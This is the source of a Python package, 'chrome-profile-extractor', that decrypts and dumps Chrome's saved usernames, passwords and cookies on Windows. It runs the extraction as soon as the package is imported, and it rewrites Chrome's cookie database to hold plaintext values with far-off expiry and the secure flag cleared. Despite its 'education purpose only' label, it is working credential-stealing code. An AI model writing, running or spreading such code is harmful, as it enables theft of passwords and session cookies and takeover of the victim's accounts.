import os
import sqlite3
import shutil
from .encrypt import get_encryption_key
from .decrypt import decrypt_password
from .chrome_datetime import get_chrome_datetime


def extract():
    # get the AES key
    key = get_encryption_key()
    # local sqlite Chrome database path
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                           "Google", "Chrome", "User Data", "default", "Login Data")
    # copy the file to another location
    # as the database will be locked if chrome is currently running
    filename = "ChromeData.db"
    shutil.copyfile(db_path, filename)
    # connect to the database
    db = sqlite3.connect(filename)
    cursor = db.cursor()
    # `logins` table has the data we need
    cursor.execute("""select origin_url, action_url, username_value, password_value,
     date_created, date_last_used from logins order by date_created""")

    data = []
    # iterate over all rows
    for row in cursor.fetchall():
        origin_url, action_url, username, password, date_created, date_last_used, result = row[0], row[1], row[
            2], decrypt_password(row[3], key), row[4], row[5], {}
        if username or password:
            result["original_url"], result["action_url"], result["username"], result[
                "password"] = origin_url, action_url, username, password
        else:
            continue
        if date_created != 86400000000 and date_created:
            result["creation_date"] = str(get_chrome_datetime(date_created))
        if date_last_used != 86400000000 and date_last_used:
            result["last_used"] = str(get_chrome_datetime(date_last_used))
        data.append(result)

    cursor.close()
    db.close()
    try:
        # try to remove the copied db file
        os.remove(filename)
    except:
        pass
    finally:
        return data


extract_password = extract()

if __name__ == "__main__":
    print(len(extract_password), extract_password)



from Crypto.Cipher import AES
import win32crypt

def decrypt_password(password, key):
    try:
        # get the initialization vector
        iv = password[3:15]
        password = password[15:]
        # generate cipher
        cipher = AES.new(key, AES.MODE_GCM, iv)
        # decrypt password
        return cipher.decrypt(password)[:-16].decode()
    except:
        try:
            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
        except:
            # not supported
            return "not supported"


import os,json,base64,win32crypt

def get_encryption_key():
    local_state_path = os.path.join(os.environ["USERPROFILE"],
                                    "AppData", "Local", "Google", "Chrome",
                                    "User Data", "Local State")
    with open(local_state_path, "r", encoding="utf-8") as f:
        local_state = json.loads(f.read())

    key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]
    return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]


import os
import sqlite3
import shutil
from .chrome_datetime import get_chrome_datetime
from .encrypt import get_encryption_key
from .decrypt import decrypt_password


def extract():
    # local sqlite Chrome cookie database path
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                           "Google", "Chrome", "User Data", "Default", "Network", "Cookies")
    # copy the file to current directory
    # as the database will be locked if chrome is currently open
    filename = "Cookies.db"
    if not os.path.isfile(filename):
        # copy file when does not exist in the current directory
        shutil.copyfile(db_path, filename)
    # connect to the database
    db = sqlite3.connect(filename)
    # ignore decoding errors
    db.text_factory = lambda b: b.decode(errors="ignore")
    cursor = db.cursor()
    # get the cookies from `cookies` table
    cursor.execute("""
    SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value 
    FROM cookies""")
    # you can also search by domain, e.g thepythoncode.com
    # cursor.execute("""
    # SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value
    # FROM cookies
    # WHERE host_key like '%thepythoncode.com%'""")
    # get the AES key
    key = get_encryption_key()
    cookies = []
    for host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value in cursor.fetchall():
        if not value:
            decrypted_value = decrypt_password(encrypted_value, key)
        else:
            # already decrypted
            decrypted_value = value
        cookies.append({"host": host_key, "cookie_name": name, 'cookie_value_decypted': decrypted_value,
                        'creation_datetime_UTC': get_chrome_datetime(creation_utc),
                        "last_access_datetime_UTC": get_chrome_datetime(last_access_utc),
                        "expire_datetime_UTC": get_chrome_datetime(expires_utc)})
        cursor.execute("""
        UPDATE cookies SET value = ?, has_expires = 1, expires_utc = 99999999999999999, is_persistent = 1, is_secure = 0
        WHERE host_key = ?
        AND name = ?""", (decrypted_value, host_key, name))
    # commit changes
    db.commit()
    # close connection
    db.close()
    return cookies

extract_cookie = extract()

if __name__ == "__main__":
    print(extract_cookie)



from datetime import datetime, timedelta


# def get_chrome_datetime(chrome_date):
#     """Return a `datetime.datetime` object from a chrome format datetime
#     Since `chrome_date` is formatted as the number of microseconds since January 1601"""
#     return datetime(1601, 1, 1) + timedelta(microseconds=chrome_date)

def get_chrome_datetime(chromedate):
    """Return a `datetime.datetime` object from a chrome format datetime
    Since `chromedate` is formatted as the number of microseconds since January, 1601"""
    if chromedate != 86400000000 and chromedate:
        try:
            return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
        except Exception as e:
            print(f"Error: {e}, chromedate: {chromedate}")
            return chromedate
    else:
        return ""



from setuptools import setup

with open("README.md", "r") as fh:
    description = fh.read()

setup(
    name="chrome-profile-extractor",
    version="1.0.1",
    description="this package for education purpose only.",
    long_description=description,
    long_description_content_type="text/markdown",
    packages=['chrome_profile_extractor'],
    author="Han Zaw Nyein",
    author_email="hanzawnyineonline@gmail.com",
    zip_safe=False,
    url=' https://github.com/HanZawNyein/chrome-profile-extractor.git',
    install_requires=['pycryptodome==3.14.1', 'pywin32==303']
)
